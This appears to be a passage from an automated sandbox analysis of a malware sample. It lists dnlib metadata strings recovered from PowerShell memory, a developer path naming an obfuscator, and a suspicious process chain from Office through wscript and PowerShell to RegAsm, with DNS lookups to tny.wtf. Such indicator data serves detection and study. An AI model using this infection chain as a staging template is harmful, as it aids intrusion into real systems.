              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
